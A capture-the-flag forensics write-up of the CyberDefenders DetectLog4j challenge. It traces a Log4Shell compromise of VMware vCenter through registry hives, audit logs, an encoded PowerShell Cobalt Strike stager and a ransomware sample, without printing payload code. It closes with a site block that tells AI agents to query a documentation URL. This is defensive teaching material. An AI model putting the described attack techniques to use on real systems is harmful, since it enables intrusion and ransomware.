# DetectLog4j Hey everyone. This writeup focuses on the challenge DetectLog4j from Cyberdefenders.org (). The challenge focuses on disk forensics via a provided .E01 file. I used Autopsy, Registry Explorer and to solve the questions of this challenge. In general, I don’t want to just click any buttons and see the solution, but also understand where to find certain information on the provided image. For more information about Log4Shell, I suggest watching the video and PoC of John Hammond on youtube () *** ## **Question 1: What is the computer hostname?** At first, I imported the provided disk image into Autopsy. To answer the first question, I searched for OS infos within Autopsy.

This went quick and easy, but since I want to learn some techniques and new tools, I am not very happy with this solution. So, I researched where to find information about the hostname of a computer. I found out, that I had to search for the *ComputerName* key within the *SYSTEM* registry hive. To solve this, I exported the hives with Autopsy, imported the SYSTEM hive to Registry Explorer and searched for the relevant key.

## **Question 2: What is the Timezone of the compromised machine?** To answer this question, I used the previously dumped SYSTEM registry hive and used Registry Explorer again, to search for thw word *timezone*.

I found the value of the corresponding registry key, but I had to translate it into the UTC (Coordinated Universal Time). ## **Question 3: What is the current build number on the system?** A quick Google search showed me, that I had to search for the registry key *CurrentVersion* within the *SOFTWARE* registry hive. The correct value name *BuildNumber* is located in the key path *SOFTWARE: Microsoft\Windows NT\CurrentVersion*

## **Question 4: What is the computer IP?** Again, a quick Google search showed me, to look for this path: > SYSTEM: ControlSet001\Services\Tcpip\Parameters\Interfaces\\ The subkeys within this path describe each adapter for the corresponding machine.

## **Question 5: What is the domain computer was assigned to?** I found the answer within the following path: > SYSTEM: ControlSet001\Services\Tcpip\Parameters

## **Question 6: When was myoussef user created?** My first thought was to look through the *C:\Users* directory within the provided disk image. Unfortunately, the username *myoussef* is not located in this directory.

It could be, that *myoussef* is a domain user account with a structre like FIRSTLETTERFROMFIRSTNAME (m) SURNAME (youssef). I decided to dump the *SAM* hive. > This hive is the Security Account Manager and contains various information about user accounts, which logon onto the system. With Registry Explorer I clicked through the hive and found interessting information in the following path: > ROOT\SAM\Domains\Account\Users Here, I found information about many more accounts, than within the C:\Users directory, *myoussef* included. I filtered for this account and could find the right answer.

## **Question 7: What is the user mhasan password hint?** The solution can be found with the method described in Question 6. ## **Question 8: What is the version of the VMware product installed on the machine?** With Registry Explorer I searched for *vmware* and clicked through the results, until I found the key path: > ROOT\Microsoft\Windows\CurrentVersion\Uninstall\VMware-VCS with the subkey *DisplayVersion.*

## **Question 9: What is the version of the log4j library used by the installed VMware product?** I used the keyword search option of Autopsy, to search for specific keywords (here: log4j). The global search gave me like 940 results of the whole disk image. Within these results, I searched manually for .jar files.

## **Question 10: What is the log4j library log level specified in the configuration file?** Based on a Google search, I found out that the log4j configuration can be stored within a .xml file. I refined my search query (RegEx) and found the correct .xml file.

## **Question 11: The attacker exploited log4shell through an HTTP login request. What is the HTTP header used to inject payload?** The answer can not be found within the disk image. Therefore, I googled how to exploit log4j in vmWare vCenter. This link helped me: > ## **Question 12: The attacker used the log4shell.huntress.com payload to detect if vcenter instance is vulnerable. What is the first link of the log4huntress payload?** Based on my research for the previous task, I came across a log file that gives me the answer (audit\_events.log). This file contains various attempts regarding *log4shell.huntress.com.* In addition, you can see how the exploit resp. the command used for exploitation can be obfuscated. ## **Question 13: When was the first successful login to vsphere WebClient?** Like in Question 12, I used the audit\_events.log file to answer this question.

Keep in mind, to convert the given PST timezone into UTC. ## **Question 14: What is the attacker’s IP address?** Again, this information can be found in the above mentioned log. Search for suspicious looking events and failed logins.

## **Question 15: What is the port the attacker used to receive the cobalt strike reverse shell?** This is a tough question, in my opinion and it requires several steps, to gain the answer. At first I thought about looking for network connections to the attacker’s IP address on the disk image. Therefore, I exported various Windows Event Logs. With Hayabusa and Timeline Explorer I analyzed them, but I couldn’t find any useful information about that. But in one of the Logs (Powershell Operational) I found a very suspicious looking base64 encoded string.

It looks like, the string is encoded with a combination of base64 and gzip. I used cyberchef with the *from base64 and gunzip recipes* and got interessting code.

I copied this code into a new .ps1 file and tried to analyze it. Line 27 contains another suspicious base64 encoded string. Again, I decoded it, but within the gargabe I just saw the attacker IP address and some pieces of a User-Agent, but not the port.

So, I had to run this script an my virtual machine. Therefore, I used fakenet to observe the traffic. In the output, I searched for *powershell.exe* and noticed the correct port and found the attacker’s IP address and the User-Agent in the output too.

## **Question 16: What is the script name published by VMware to mitigate log4shell vulnerability?** I searched with Google for the correct answer within a knowledge base article from vmWare. ## **Question 17: In some cases, you may not be able to update the products used in your network. What is the system property needed to set to ‘true’ to work around the log4shell vulnerability?** Again, I searched Google with some words of the question and found the answer very quickly. ## **Question 18: What is the log4j version which contains a patch to CVE-2021–44228?** Again, I searched Google with some words of the question and found the answer very quickly. ## **Question 19: Removing JNDIlookup.class may help in mitigating log4shell. What is the sha256 hash of the JNDILookup.class?** From the previous questions I know, that we are dealing with version 2.11.2 of log4j. With this page > I found various hash values of the relevant files. Another solution would be, to export the file *log4j-core-2.11.2.jar*, change the extension to *.zip*, extract the contents and generate the SHA256 hash of *JNDILookup.class.*

## **Question 20: Analyze JNDILookup.class. What is the value stored in the CONTAINER\_JNDI\_RESOURCE\_PATH\_PREFIX variable?** I analyzed the file with a Java decompiler (jd-gui).

## **Question 21: What is the executable used by the attacker to gain persistence?** The attacker used a technique to gain persistence on the attacked machine. One technique abuses the usage of the registry key *RunOnce*. Look the following links: > > > So, I checked the *NTUSER.DAT* files of the users and noticed something strange within the *NTUSER.DAT* of the user Administrator-WINB633EO9K91M. Under this key path > ROOT\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce I noticed a suspicious value.

## **Question 22: When was the first submission of ransomware to virustotal?** I dumped and analyzed the Master File Table (MFT) from the disk image. To be honest, I happened to find a suspicious entry in the root directory of the image with the hash

## **Question 23: The ransomware downloads a text file from an external server. What is the key used to decrypt the URL?** I extracted the suspicious file and used dnSpy to analyze it. Within the entry point I noticed a suspicious string variable:

## **Question 24: What is the ISP that owns that IP that serves the text file?** There are two ways to solve this answer: 1. Click through virustotal, to get some relevant information about the contacted domain. The ISP can be read easily:

2\. All the relevant information are visible in this screenshot:

The webclient downloads a file from a specific string resp. encrypted URL. To decrypt the URL, you have to combine the given elements (red and blue arrows). I used CyberChef to decrypt the string from the variable *text* with the key stored in the variable *text3*. A lot of malware uses the XOR-encryption. In addition, there is a decryption-function implemented:

To get the name of the ISP, I used a simple whois. ## **Question 25: The ransomware check for extensions to exclude them from the encryption process. What is the second extension the ransomware checks for?** The extension check is performed with this piece of code:

Since the question asks for the second extension, I used CyberChef again to decrypt the string in variable *text3*.

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://txc.gitbook.io/documentation/writeups/cyberdefenders/detectlog4j.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.